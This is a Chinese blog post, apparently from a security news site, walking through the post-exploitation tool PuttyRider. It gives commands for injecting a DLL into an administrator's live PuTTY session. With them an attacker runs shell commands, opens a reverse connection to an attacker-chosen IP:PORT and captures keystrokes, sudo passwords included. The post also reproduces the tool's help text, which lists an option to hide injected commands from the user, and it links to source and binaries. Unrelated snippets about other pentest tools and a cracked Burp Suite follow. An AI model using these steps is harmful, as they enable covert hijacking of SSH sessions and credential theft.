Putty的噩梦——渗透工具PuttyRider使用心得分享

我们在入侵到一台主机的时候,经常会看到管理员的桌面会放着putty.exe,这说明有很大的可能性管理员是使用putty远程管理主机的。

该工具主要是针对SSH客户端putty的利用,采用DLL注入的方式,来实现各种猥琐的利用姿势。

我依次演示该工具的三种利用场景

1)当你远程控制对方主机的时候,管理员正好用putty连接着远程主机

这种情景,我们只要直接注入命令到当前的putty进程,就可以利用,非常简单,缺点是没有回显。

使用puttyRider.exe –l 查看当前进程中putty正在连接的远程主机信息,这里不光能得到远程主机的IP地址和putty进程号,

还能在Injected列看到当前是NO,说明我们还没有进程注入。

我们使用puttyrider.exe –p 0 –f –c ifconfig,就把ifconfig命令注入到当前的putty会话了,就达到远程命令执行的目的了。

再次puttyRider.exe –l 看一下,发现injected列是yes了,说明我们注入进程成功了。

2)使用反弹的方式实时看管理员的输入

除了利用第一种方法直接注入命令,我们还可以反弹出来,实时看到对方管理员在putty里的输入,即使管理输入sudo这种命令,我们也能够看到他输入的明文密码。

但是这种利用的前提是,对方管理员正在用PUTTY连接的主机可以反弹到你监听的IP地址,防火墙限制的不是很严。

Puttyrider.exe –p 0 –r 我监听的IP:端口

执行后,我们就可以看到结果了

3)我运气不这么好,对方管理员当前没有正在使用PUTTY管理远程主机

这种情况应该最常见了,软件作者也考虑到了,给我们提供了-w参数,他会让puttyrider后台监视新起来的进程,然后反弹到我们的主机,也能实时的看到对方的操作哦,包括输入的账号

Puttyrider.exe –w –r 我监听的IP:端口号

当执行完这个命令后,只要管理员下次再次开启PUTTY的时候,我们就能在监听的9999端口看到她的SHELL了

最后如果想研究工具细节的童鞋,可以在

https://codeload.github.com/seastorm/PuttyRider/zip/master下载源码,深入学习 :)

编译好的二进制文件可以在

https://github.com/seastorm/PuttyRider/releases/download/0.1/PuttyRider-bin.zip下载

==========================================================================

安全脉搏SP主编来提供一下高级的演示文档和基础的参数使用:

Documentation

Usage

Operation modes:
    -l      List the running Putty processes and their connections
    -w      Inject in all existing Putty sessions and wait for new sessions
            to inject in those also
    -p PID  Inject only in existing Putty session identified by PID.
            If PID==0, inject in the first Putty found
    -x      Cleanup. Remove the DLL from all running Putty instances
    -d      Debug mode. Only works with -p mode
    -c CMD  Automatically execute a Linux command after successful injection
            PuttyRider will remove trailing spaces and ‘&‘ character from CMD
            PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD
    -h      Print this help

Output modes:
    -f          Write all Putty conversation to a file in the local directory.
                The filename will have the PID of current putty.exe appended
    -r IP:PORT  Initiate a reverse connection to the specified machine and
                start an interactive session.

Interactive commands (after you receive a reverse connection):
    !status     See if the Putty window is connected to user input
    !discon     Disconnect the main Putty window so it won‘t display anything
                This is useful to send commands without the user to notice
    !recon      Reconnect the Putty window to its normal operation mode
    CMD         Linux shell commands
    !exit       Terminate this connection
    !help       Display help for client connection

【本文来源 : 360漏洞播报 作者Mickey SP主编整理发布】

转载请注明:安全脉搏 » Putty的噩梦——渗透工具PuttyRider使用心得分享

时间: 2024-10-29 00:56:59

Putty的噩梦——渗透工具PuttyRider使用心得分享的相关文章

windows系统-web渗透工具-AWVS

windows系统-web渗透工具-AWVS ACUNETIX WEB VULNERABILITY SCANNER(AWVS) Awvs是一款很出名的web安全扫描器,属于windows系统平台下最流行的扫描器之一,是商业版本[有破解版],相对开源软件,较为细化.支持AJAX.JavaScript,对客户端的脚本代码支持,会更好,能更容易发现隐藏更深的URL地址等. 1.AcuSensor 灰盒测试[AWVS最大的特点其他扫描器不具备] #需服务端布置agent 发现爬网无法发现文件 额外的漏洞

Android开发环境使用到工具的认识心得

Android开发环境使用到工具的认识心得         今天我们围绕的主角是一些超级棒的 C 和 C++ 的集成开发环境(IDE)和编译器.IDE 主要是在程序员开发时提供各种软件应用组件,最受程序员欢迎的 IDE 都有一个共同点,那就是非常有吸引力的用户界面.这里我们收集了一些最好的 C 和 C++ 的 IDEs 和编译器.        (1) Eclipse CDT               是 Eclipse 插件(它是一个在Eclipse下可以搞C++代码的插件.),它将把 Ec

python打造渗透工具集

python是门简单易学的语言,强大的第三方库让我们在编程中事半功倍,今天我们就来谈谈python在渗透测试中的应用,让我们自己动手打造自己的渗透工具集. 难易程度:★★★阅读点:python;web安全;文章作者:xiaoye文章来源:i春秋关键字:网络渗透技术 一.信息搜集–py端口扫描小脚本端口扫描是渗透测试中常用的技术手段,发现敏感端口,尝试弱口令或者默认口令爆破也是常用的手段,之前自学python时候百度着写了个小脚本.端口扫描小脚本: #coding: utf-8 import so

渗透工具sqlmap学习

对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能. sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞.它由python语言开发而成,因此运行需要安装python环境. 检测注入点 显示数据库名称 当前的数据库 数据库使用账户 列出数据库用户 数据库账户与密码 列出数据库中的表 列出表中字段 显示字段内容 指定导出特定范围的字段内容 检测注入点 python sqlmap.py -u 请求地址 --batch -u:指定注入点url 如果注入成功则

burpsuite 渗透工具 永久破解版

Burp Suite 是用于攻击web 应用程序的集成平台,它包含了许多渗透工具.???BurpSuite是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,包含了Proxy,Spider,Scanner,Intruder,Repeater,Sequencer,Decoder,Comparer等工具模块.通过拦截HTTP/HTTPS的web数据包,充当浏览器和相关应用程序的中间人,进行拦截.修改.重放数据包进行测试,是web安全人员的一把必备的瑞士×××. 最近好

使用ABBYY FlexiCapture Engine SDK开发OCR应用的心得分享

介绍 几周前,我在空闲时间使用泰比公司(ABBYY)的FlexiCapture Engine试用版创建了一些简单的OCR应用.FlexiCapture Engine是一款用于创建数据捕捉应用的SDK,能够打开图像.PDF文件及扫描文件,对有价值的数据及字段进行分类及提取.提取的数据可导出至Excel.XML.CSV.PDF 格式文件,也可以导出至外部数据库.DMS及ECM系统. 开始创建 在已经装有开发工具(如MS Visual Studio)的电脑上安装SDK,之后SDK会出现10多种示例应用

python 爬虫抓取心得分享

/** author: insun title:python 爬虫抓取心得分享 blog:http://yxmhero1989.blog.163.com/blog/static/112157956201311821444664/ **/    0x1.urllib.quote('要编码的字符串') 如果你要在url请求里面放入中文,对相应的中文进行编码的话,可以用: urllib.quote('要编码的字符串') query = urllib.quote(singername) url = 'h

Unity3D心得分享

=========================== Unity Runtime Unity3D 材质球设置参数无效果的解决方法 Unity3D Function Not Supported - Unity动画事件提示不支持的解决方法 Unity3D欧拉和四元数两种旋转的用法 通过扩展方法让GetComponent直接获得接口 Vector3.Set的正确使用 =========================== NGUI Plugins NGUI UIPanel绘制原理学习 List<T>

我的WebX框架学习总结与心得分享

最近学习了webx框架, 利用博客园跟大家分享一下自己的学习心得; 周建旭 2014-08-21 网上关于webx的资料少的可怜, 怎么办?  这种情况下不用去求助别人求人只会耽误时间, 不用畏惧; 看文档写demo 就ok了; API是最好的资料, webx官方有个pdf的中文文档提供下载, 建议在学webx之前, 先整体浏览一遍文档以便于把握webx框架的大体脉络, 第一遍看的过程不必钻牛角尖 ; 然后结合淘宝官方Michael Zhou的Petstore(宠物商店)例子对比一下文档(那块不